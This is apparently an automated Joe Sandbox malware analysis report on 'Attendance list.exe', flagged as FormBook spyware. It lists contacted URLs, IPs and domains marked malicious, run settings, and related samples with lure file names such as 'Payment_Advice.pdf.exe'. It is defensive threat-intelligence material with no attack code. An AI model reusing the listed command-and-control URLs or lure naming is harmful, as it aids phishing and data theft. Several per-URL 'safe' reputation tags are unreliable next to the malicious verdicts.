                  • Avira URL Cloud: safe
                  		unknown
                  https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://static.loopia.se/responsive/images/iOS-72.pngsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.domaintechnik.at/data/gfx/dt_logo_parking.pngsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006F78000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005FD8000.00000004.10000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://static.loopia.se/shared/logo/logo-loopia-white.svgsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwesSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchclip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parksSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.domaintechnik.at/fileadmin/gfx/icons/free-basic-hosting.pngsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006F78000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005FD8000.00000004.10000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.csssSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006DE6000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005E46000.00000004.10000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.hprlz.cz/w6qg/?Jjv=GpKhRVSHzLA8j4R&amp;66s0QHx=0lpTRQcDUHsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000005FC4000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005024000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2467474395.000000001DF14000.00000004.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://static.loopia.se/shared/images/additional-pages-hero-shape.webpsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://static.loopia.se/shared/style/2022-extra-pages.csssSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://static.loopia.se/responsive/images/iOS-114.pngsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoclip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.networksolutions.com/sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000660C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.000000000566C000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parksSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.domaintechnik.at/fileadmin/pics/logos/icann.gifsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006F78000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005FD8000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lansSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.ecosia.org/newtab/clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdfsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000660C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.000000000566C000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://static.loopia.se/responsive/styles/reset.csssSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ac.ecosia.org/autocomplete?q=clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://static.loopia.se/responsive/images/iOS-57.pngsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.hprlz.cz/w6qg/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=0lpTRQcDUHsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000005FC4000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005024000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2467474395.000000001DF14000.00000004.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.jssSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006DE6000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005E46000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pasSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.000000000729C000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.00000000062FC000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pasSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.dmtxwuatbz.ccsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4470199109.00000000080C0000.00000040.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkinsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.hatercoin.online/wf3a/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=EKVDXBgImxJWeZhJNsklc3Q8dq4iVG0MTaJQIsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.00000000062E8000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005348000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=clip.exe, 00000004.00000003.2363580118.000000000795E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/typo3-2.pngsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006F78000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005FD8000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pasSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006AC2000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4466269817.00000000076B0000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005B22000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/piwik.pngsSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000006F78000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000005FD8000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  23.251.54.212
                  		www.anuts.topUnited States
                  		62468VPSQUANUStrue
                  172.67.210.102
                  		www.dmtxwuatbz.ccUnited States
                  		13335CLOUDFLARENETUStrue
                  213.145.228.16
                  		www.sandranoll.comAustria
                  		25575DOMAINTECHNIKATtrue
                  194.9.94.85
                  		www.xn--matfrmn-jxa4m.seSweden
                  		39570LOOPIASEtrue
                  5.44.111.162
                  		www.hprlz.czGermany
                  		45031PROVIDERBOXIPv4IPv6DUS1DEfalse
                  217.160.0.106
                  		www.catherineviskadi.comGermany
                  		8560ONEANDONE-ASBrauerstrasse48DEtrue
                  208.91.197.27
                  		www.bfiworkerscomp.comVirgin Islands (BRITISH)
                  		40034CONFLUENCE-NETWORK-INCVGtrue
                  91.195.240.19
                  		parkingpage.namecheap.comGermany
                  		47846SEDO-ASDEtrue
                  194.58.112.174
                  		www.helpers-lion.onlineRussian Federation
                  		197695AS-REGRUtrue
                  199.192.19.19
                  		www.telwisey.infoUnited States
                  		22612NAMECHEAP-NETUStrue
                  43.252.167.188
                  		www.xn--fhq1c541j0zr.comHong Kong
                  		38277CLINK-AS-APCommuniLinkInternetLimitedHKtrue
                  142.250.181.243
                  		ghs.googlehosted.comUnited States
                  		15169GOOGLEUSfalse

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1465846
                  Start date and time:2024-07-02 07:14:04 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 10m 11s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:8
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Attendance list.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@7/5@14/12
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 92%
                  • Number of executed functions: 57
                  • Number of non-executed functions: 269
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  01:15:44API Interceptor12013594x Sleep call for process: clip.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  23.251.54.212Payment_Advice.pdf.exeGet hashmaliciousFormBookBrowse
                  • www.anuts.top/niik/
                  BL7247596940.pdf.exeGet hashmaliciousFormBookBrowse
                  • www.anuts.top/niik/?wp=Y4bXb&PRT4=H/YiygX9KITTv7luV6yUPKrN50P+s1tzENv79uR8DwTDmQwOwNUPDlYEBevB1BzVmv2ACSfGFUmX0UJ7u9Bld+nnTqDy3OkaCqYdjJlbok8OnyXr0/DiKgU=
                  Arrival Notice.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                  • www.anuts.top/niik/
                  172.67.210.102Swift Copy #U00a362,271.03.Pdf.exeGet hashmaliciousFormBookBrowse
                    PO-104678522.exeGet hashmaliciousFormBookBrowse
                      213.145.228.16Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                      • www.sandranoll.com/zg5v/
                      Swift Message.pdf.exeGet hashmaliciousFormBookBrowse
                      • www.sandranoll.com/cga5/
                      1LZvA2cEfV.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                      • www.sandranoll.com/4bud/
                      Payment Details- scanslip000002343.exeGet hashmaliciousFormBookBrowse
                      • www.sandranoll.com/4bud/
                      DRAFT DOCS RSHA25491003.exeGet hashmaliciousFormBookBrowse
                      • www.sandranoll.com/4bud/
                      Payment_Advice.pdf.exeGet hashmaliciousFormBookBrowse
                      • www.sandranoll.com/niik/
                      PO.4563.0002_2024.exeGet hashmaliciousFormBookBrowse
                      • www.sandranoll.com/4bud/
                      BL7247596940.pdf.exeGet hashmaliciousFormBookBrowse
                      • www.sandranoll.com/niik/?wp=Y4bXb&PRT4=bOhbf9nA9ANf4gKZ0D/cx2mKLKP5h5S6BzYsYRymqO0Y7ABdmDatfS6UnB5JwDymuRUltFOJ97FMgck4gZZuLOGJ5Y8WdAQExr4HhgBx2rUiFV4bYBTJf60=
                      Arrival Notice.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                      • www.sandranoll.com/niik/
                      Swift Copy.scr.exeGet hashmaliciousFormBookBrowse
                      • www.biogenaacademy.com/dv8v/?C6wuZ6u=7kTofYbL2AUa2n+1T8OImB3IaqDbRXE5en7vEWX2r3z88/v81Qh+cznGEdnCcv5tX3s9gr78jwAa8ly/AN6tSeymbDZrW0vlXQ==&JkIGj=I2R0IR
                      194.9.94.85Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                      • www.xn--matfrmn-jxa4m.se/5m4b/
                      Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                      • www.torentreprenad.com/r45o/
                      Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                      • www.torentreprenad.com/r45o/
                      TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                      • www.torentreprenad.com/r45o/
                      ORDER TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                      • www.torentreprenad.com/r45o/
                      D7KV2Z73zC.rtfGet hashmaliciousFormBookBrowse
                      • www.xn--matfrmn-jxa4m.se/ufuh/
                      Scan Doc.docx.docGet hashmaliciousFormBookBrowse
                      • www.xn--matfrmn-jxa4m.se/ufuh/
                      Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                      • www.torentreprenad.com/r45o/
                      product Inquiry and RFQ ART LTD.docGet hashmaliciousFormBookBrowse
                      • www.xn--matfrmn-jxa4m.se/ufuh/
                      New Order.docGet hashmaliciousFormBookBrowse
                      • www.xn--matfrmn-jxa4m.se/ufuh/

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      www.dmtxwuatbz.ccSwift Copy #U00a362,271.03.Pdf.exeGet hashmaliciousFormBookBrowse
                      • 172.67.210.102
                      PO-104678522.exeGet hashmaliciousFormBookBrowse
                      • 172.67.210.102
                      NEW ORDER-RFQ#10112023Q4.exeGet hashmaliciousFormBookBrowse
                      • 104.21.45.56
                      NEW ORDER 75647839384.exeGet hashmaliciousFormBookBrowse
                      • 104.21.45.56
                      www.sandranoll.comNavana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      Swift Message.pdf.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      1LZvA2cEfV.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                      • 213.145.228.16
                      Payment Details- scanslip000002343.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      DRAFT DOCS RSHA25491003.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      Payment_Advice.pdf.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      PO.4563.0002_2024.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      BL7247596940.pdf.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      Arrival Notice.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                      • 213.145.228.16
                      www.anuts.top2OdHcYtYOMOepjD.exeGet hashmaliciousFormBookBrowse
                      • 23.251.54.212
                      Tekstlinie.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                      • 23.251.54.212
                      Purchase order.pdf.exeGet hashmaliciousFormBookBrowse
                      • 23.251.54.212
                      dMY6QiHAIpPPqiV.exeGet hashmaliciousFormBookBrowse
                      • 23.251.54.212
                      Purchase order.pdf.exeGet hashmaliciousFormBookBrowse
                      • 23.251.54.212
                      UNIVERSITY OF_ SHARJAH- Project FMD20240342_pdf.exeGet hashmaliciousFormBookBrowse
                      • 23.251.54.212
                      33BMmt58Bj.exeGet hashmaliciousFormBookBrowse
                      • 23.251.54.212
                      Payment_Advice.pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                      • 23.251.54.212
                      Payment_Advice.pdf.exeGet hashmaliciousFormBookBrowse
                      • 23.251.54.212
                      BL7247596940.pdf.exeGet hashmaliciousFormBookBrowse
                      • 23.251.54.212
                      www.xn--matfrmn-jxa4m.seNavana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      D7KV2Z73zC.rtfGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      Scan Doc.docx.docGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      BASF Purchase Order.docGet hashmaliciousFormBookBrowse
                      • 194.9.94.86
                      SecuriteInfo.com.Win32.PWSX-gen.24627.22980.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      product Inquiry and RFQ ART LTD.docGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      New Order.docGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      GXu0Ow8T1h.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      GcwoApxt8q.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      Doc PI.docGet hashmaliciousFormBookBrowse
                      • 194.9.94.86

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      DOMAINTECHNIKATNavana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      Swift Message.pdf.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      1LZvA2cEfV.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                      • 213.145.228.16
                      Payment Details- scanslip000002343.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      DRAFT DOCS RSHA25491003.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      Payment_Advice.pdf.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      PO.4563.0002_2024.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      BL7247596940.pdf.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.16
                      Arrival Notice.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                      • 213.145.228.16
                      DOC_6653.exeGet hashmaliciousFormBookBrowse
                      • 213.145.228.111
                      CLOUDFLARENETUShttps://guardianesdelbosque.orgGet hashmaliciousUnknownBrowse
                      • 104.22.50.131
